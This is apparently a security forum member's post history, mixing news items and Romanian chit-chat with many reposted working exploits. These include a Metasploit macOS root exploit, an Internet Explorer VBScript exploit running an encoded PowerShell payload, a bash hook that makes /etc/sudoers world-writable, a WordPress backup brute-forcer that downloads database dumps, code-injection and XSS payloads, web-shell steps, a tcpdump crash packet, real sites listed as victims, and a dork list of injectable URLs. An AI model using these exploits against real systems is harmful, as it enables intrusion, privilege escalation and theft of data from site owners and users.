Aerosol
-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
OpenVPN has patched a denial-of-service vulnerability which authenticated users could trigger by sending malicious packets. The flaw (CVE-2014-8104) is most hurtful to VPN service providers and was reported by researcher Dragana Damjanovic to OpenVPN last month. Maintainers said in an advisory issued this morning that the flaw affected versions back to at least 2005 and allowed TLS-authenticated clients to crash the server by sending a too-short control channel packet to the server. "In other words this vulnerability is denial of service only," they said. "An OpenVPN server can be easily crashed using this vulnerability by an authenticated client. However, we are not aware of this exploit being in the wild before we released a fixed version. "Confidentiality and authenticity of traffic are not affected." The impact of the vulnerability was reduced since attackers had to be authenticated clients meaning client certificates and TLS would be sufficent safety provided trusted machines were not popped. VPN service providers and other servers using the 'client-cert-not-required' and username/password access were exposed since all users could acquire client certificates and TLS authentication keys. "The first fixed, non-vulnerable version is 2.0.11 - you should upgrade to it as soon as possible, especially if you suspect some clients might be malicious," the maintainers said. The OpenVPN 3.x codebase used in most OpenVPN Connect clients on Android and iOS was not vulnerable. A fixed version of OpenVPN (2.3.6) was released 1st Dec 2014 at around 18:00 UTC. The fix was also backported to the OpenVPN 2.2 branch and released in OpenVPN 2.2.3, a source-only release. So far VPN providers CryptoStorm and Perfect Privacy have patched. Source
-
ha ha interesant, dar cine a auzit de deastea in afara de avast... -
# Exploit Title: SQL Buddy Remote Code Execution # Date: November 29 2014 # Exploit Author: Fady Osman (@fady_osman) # Youtube Channel : https://www.youtube.com/user/cutehack3r # Vendor Homepage: http://sqlbuddy.com/ # Software Link: https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip # Version: SQL Buddy 1.3.3 # Tested on: Kubuntu 14.10 SQLBuddy provides a web based mysql administration and it's included in packages like wamp server. SQL Buddy suffers from a remote code execution. This happens due to the fact that it allows the user to login using any server he wants and that it allows the user to export data from the database to a file on the webserver. In order to exploit this bug do the following steps: 1- Use a sql server you control and have a valid credentials for (You can use one of the free mysql hosting services). 2- Create a database and a table with one column of type text. 3- Insert the php code you want to execute into that table. 4- Choose the previously created table from the left menu. 5- Click Export from the top menu. 6- Choose CSV format. 7- Choose "Text File" and name the file with php extension for example shell.php. The exported file will be at : sqlbuddy/exports/ assuming you installed sqlbuddy in a folder named sqlbuddy. -- *Regards,* [image: Fady Osman on about.me] Fady Osman about.me/Fady_Osman <http://about.me/Fady_Osman> Source
-
@quadxenon era o gluma Totusi 2. Miliarde de view e ceva...
-
Hai multam, o sa iau niste carti si am sa le postez si pe RST
-
Ba astia cand intra pe google, zic cei de la google ca primesc flood On://2 miliarde de vizualizari ....
-
Cauta in continuare poate o sa ai noroc
-
stau si ma gandesc care e mai prost M.Badea sau Gadea?
-
@Eddie91 sa traiesti bre sunt foarte frumoase plus am gasit ceva ce cautam de mult timp Splatter Displacement Action | GraphicRiver inca o data multam.
-
Mai mult ca sigur e de la campul electromagnetic al centralei
-
Salut, apropo mai usor cu ":) :X" si deastea nu suntem pe mess.
-
1. Download the latest Java SE SDK version. Java SE - Downloads | Oracle Technology Network | Oracle At the time of writing the filename and version was jdk-7u17-linux-x64.tar.gz 2. Untar the Archive tar -xzvf /root/jdk-7u17-linux-x64.tar.gz mv jdk1.7.0_17 /opt cd /opt/jdk1.7.0_17 3.This step registers the downloaded version of Java as an alternative, and switches it to be used as the default: update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1 update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1 update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1 update-alternatives --set java /opt/jdk1.7.0_17/bin/java update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so Source
-
Source ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation', 'Description' => %q{ A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue has been patched silently in Yosemite. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post 'joev' # copy/paste monkey ], 'References' => [ [ 'CVE', '2014-4404' ], [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ], # Heap overflow: [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ], # kALSR defeat: [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ] ], 'Platform' => 'osx', 'Arch' => ARCH_X86_64, 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014' )) end def check if ver_lt(osx_ver, "10.10") Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404') binary_exploit = File.read(File.join(exploit_path, 'key_exploit')) binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" print_status("Writing exploit file as '#{exploit_file}'") write_file(exploit_file, binary_exploit) register_file_for_cleanup(exploit_file) print_status("Writing payload file as '#{payload_file}'") write_file(payload_file, binary_payload) register_file_for_cleanup(payload_file) print_status("Executing payload...") cmd_exec("chmod +x #{exploit_file}") cmd_exec("chmod +x #{payload_file}") cmd_exec("#{exploit_file} #{payload_file}") end def osx_ver cmd_exec("sw_vers -productVersion").to_s.strip end def ver_lt(a, Gem::Version.new(a) < Gem::Version.new( end end
-
The FBI has made it no secret that it hates Apple and Google's efforts to encrypt files in your smartphones and tablets. Now court documents have emerged showing just how far the Feds are willing to go to decrypt citizens' data. The paperwork has shown two cases where federal prosecutors have cited the All Writs Act – which was enacted in 1789 as part of the Judiciary Act – to force companies to decrypt information on gadgets. The Act, which was signed into law by none other than George Washington and later revised in the 20th century, gives the courts the right to... issue all writs necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law. That's a pretty broad remit, but the Feds think it's just the thing to force Apple and others to break down privacy protections. Last month, New York prosecutors successfully persuaded a judge that the ancient law could be used to force an unnamed smartphone manufacturer to help unlock a phone allegedly used in a credit card fraud case. The judge ordered the manufacturer to offer "reasonable technical assistance" to make the phone's contents available. In a second case, in the northern California federal court, prosecutors specifically named Apple in a similar case using the All Writs Act. Documents obtained by Ars Technica show federal law enforcement sought to get Apple to unlock an iPhone 5S as part of a criminal case. The court filing states investigators were unwilling to try and open the iPhone for fear of damaging a crucial piece of evidence. They asked the courts to force Apple to give them a hand in safely extracting data from the passcode-protected phone. It's an interesting legal tactic, but the Feds may find out the hard way that the All Writs Act has its limitation. The argument used by Apple and Google over encryption is that, even if they wanted to help the Feds, they can't do anything about it – because modern iOS and Android encrypts data in a way that only the owner can decrypt. Apple and Google say they don't hold any skeleton keys to devices, although sensitive data may end up in the cloud for the cops to seize. "The court orders contemplate allowing companies to file an objection and if they can’t do it then Apple and Google would spend real time fighting this," EFF legal fellow Andrew Crocker told The Register. As for whether or not this law could be used to force smartphone sellers to include a backdoor or spyware for police, or even a front door as the FBI says it wants, Crocker said that such use of the All Writs Act isn't "a settled legal issue," and the EFF would be taking a long, hard look at any attempts to do so. Source
-
@misefalfaie stiu bre Bratuleanu vezi ca misefalfaie face misto de tine prietene, daca te uitai la final scria sursa da mna sa comentezi si tu...
-
@aelius multumesc pentru completare, hm eu am vazut ca e postat pe 20 nov 2014 pe Packet Storm am dat search pe forum si nu am gasit nimic si am zis ca mna...
-
@Ganav desi nu am nici-o legatura cu asta. andrey asta e defapt teparul https://rstforums.com/forum/92884-un-tepar-se-alge-cu-situl-descoperit.rst uite aici o sa te lamuresti + tema e nulled deci nu a dat nici-un ban pe ea + s-a incurcat in propriile minciuni
-
tcpdump 4.6.2 AOVD Unreliable Output tcpdump 4.6.2 Geonet Denial Of Service tcpdump 4.6.2 OSLR Denial Of Service Ha, ha am gasit si cateva exploit-uri interesante CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. 2. Summary Information It was found out that malformed network traffic (OLSR-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used. 3. Technical Description The application decoder for the OLSR protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function olsr_print (const u_char *pptr, u_int length, int is_ipv6) In this function msg_len is extracted from the input without sufficient checks and subtracted sizeof(struct olsr_msg4) which leads to an underflow of msg_tlen which is used to call olsr_print_neighbor() which will crash. In case DNS reverse lookup is enabled, this will also lead to a large amount of invalid DNS reverse lookups. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide the segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00" s.send(olsr_frame) 4. Affected versions Affected versions are 3.9.6 through 4.6.2 5. Fix The problem is fixed in the upcoming version tcpdump 4.7.0 6. Advisory Timeline 2014-11-08 Discovered 2014-11-09 Requested CVE 2014-11-11 Reported vendor by email 2014-11-12 Vendor made a fix available as repository patch 2014-11-13 CVE number received 2014-11-13 Published CVE advisory 7. Credit The issue was found by Steffen Bauch Twitter: @Steffenbauch [url]http://steffenbauch.de[/url] using a slightly enhanced version of american fuzzy lop ([url]https://code.google.com/p/american-fuzzy-lop/[/url]) created by Michal Zalewski.
-
What is sudo's grace period? When a user first call sudo to launch some commands as root he will be asked for his own password. But if the user calls sudo again in the following 5 minutes, he won't be asked for the same password. That's because the password is cached in memory for a period of time called the « grace period ». This grace period mechanism is activated by default on every systems I know where sudo can be found (Linux distros, OSX, BSDs…) Here is the exploit code (sudo_grace_period_exploit.sh) : function bash_history { if [ $? -ne 1 ] # previous command was successfull then if [ -z "${PWNED+xxx}" ] # this test is used to check if the system was already pwned then history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo ' if [ $? -eq 0 ] # previous command is a sudo one then sudo chmod 777 /etc/sudoers 2> /dev/null PWNED="yes" unset PROMPT_COMMAND 2> /dev/null fi fi fi } PROMPT_COMMAND=bash_history For More : http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf Dupa mine este foarte interesata treaba. Sacrificati din timpul vostru 5 minute, merita!
-
<!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Source
-
Vulnerability title: Code Injection in Wordpress CM Download Manager plugin CVE: CVE-2014-8877 Plugin: CM Download Manager plugin Vendor: CreativeMinds - https://www.cminds.com/ Product: https://wordpress.org/plugins/cm-download-manager/ Affected version: 2.0.0 and previous version Fixed version: 2.0.4 Google dork: inurl:cmdownloads Reported by: Phi Le Ngoc - phi.n.le@itas.vn Credits to ITAS Team - www.itas.vn ::DESCRITION:: The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 Connection: keep-alive Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php Vulnerable code: (Line: 130 -> 158) public static function alterSearchQuery($search, $query) { if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) ) { global $wpdb; $search_term = $_GET['CMDsearch']; if( !empty($search_term) ) { $search = ''; $query->is_search = true; // added slashes screw with quote grouping when done early, so done later $search_term = stripslashes($search_term); preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches); $terms = array_map('_search_terms_tidy', $matches[0]); $n = '%'; $searchand = ' AND '; foreach((array) $terms as $term) { $term = esc_sql(like_escape($term)); $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))"; } add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1); remove_filter('posts_request', 'relevanssi_prevent_default_request'); remove_filter('the_posts', 'relevanssi_query'); } } return $search; } ::SOLUTION:: Update to version 2.0.4 ::DISCLOSURE:: 2014-11-08 initial vendor contact 2014-11-10 vendor response 2014-11-10 vendor confirmed 2014-11-11 vendor release patch 2014-11-14 public disclosure ::REFERENCE:: https://downloadsmanager.cminds.com/release-notes/ http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP. Source
-
#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite DATE="20141031"; #Date to search if [ ! -e rainbow ]; then cat << -EOF- > rbow.c /*Create rainbow table for guessing wp-backup-db v2.2.4 backup path Larry W. Cashdollar*/ #include <stdio.h> int main (void) { char string[16] = "0123456789abcdef"; int x, y, z, a, b; for (x = 0; x < 16; x++) for (y = 0; y < 16; y++) for (z = 0; z < 16; z++) for (a = 0; a < 16; a++) for (b = 0; b < 16; b++) printf ("%c%c%c%c%c\n", string[x], string[y], string[z], string[a], string[b]); return(0); } -EOF- echo "[+] Compiling rbow.c" gcc rbow.c -o rbow echo "[+] Creating rainbow table..." ./rbow > rainbow fi if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk '{print $1}'`; echo "[+] Searching...."; for x in `cat rainbow`; do CPATH="http://$1/wp-content/backup-$x/"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo $x > found.txt; break; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=6;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. K=999; for y in `seq -w 0 999`; do CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=2;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done Source
-
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress - (html5-mp3-player-with-playlist) Plugin |~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/ |~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus |~Vulnerability Style : FULL PATH DISCLOSURE |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:html5plus/html5full.php ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://childhelpline.org.kh/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://falkopingstrumkar.se/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://groupe-komett.com//wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.nethinimnet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://vedanet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://auricle.org.nz/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.miguelguldimann.com/shop/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://cp2.leos.co.il/~yossimoadi/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.ambedkaritepartyofindia.org/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.zionchurchmillersville.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php .. .. .. etc ==============[Exploitation]=============================== http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php Source
-
WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress (Sexy Squeeze Pages) Plugin |~Software: http://instasqueeze.com/jv/ |~Vulnerability Style : Cross Site Scripting |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:wp-content/plugins/instasqueeze ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://instasqueeze.com ( Official ) http://gogglerank.com/ http://kangenwaterhq.com http://visualhandsconnect.com http://cynthialeecreations.com ==============[Exploitation]=============================== /instasqueeze/lp/index.php id parameter is ( index.php ) not safe. HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script> Source
-
Credit's : The Phant0m about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id= checkout1.php?cartid= comersus_listCategoriesAndProducts.php?idCategory= comersus_optEmailToFriendForm.php?idProduct= comersus_optReviewReadExec.php?idProduct= comersus_viewItem.php?idProduct= comments_form.php?ID= contact.php?cartId= content.php?id= customerService.php?****ID1= default.php?catID= description.php?bookid= details.php?BookID= details.php?Press_Release_ID= details.php?Product_ID= details.php?Service_ID= display_item.php?id= displayproducts.php downloadTrial.php?intProdID= emailproduct.php?itemid= emailToFriend.php?idProduct= events.php?ID= faq.php?cartID= faq_list.php?id= faqs.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= news.php?id= order.php?BookID= order.php?id= order.php?item_ID= OrderForm.php?Cart= page.php?PartID= payment.php?CartID= pdetail.php?item_id= powersearch.php?CartId= price.php privacy.php?cartID= prodbycat.php?intCatalogID= prodetails.php?prodid= prodlist.php?catid= product.php?bookID= product.php?intProdID= product_info.php?item_id= productDetails.php?idProduct= productDisplay.php productinfo.php?item= productlist.php?ViewType=Category&CategoryID= productpage.php products.php?ID= products.php?keyword= products_category.php?CategoryID= products_detail.php?CategoryID= productsByCategory.php?intCatalogID= 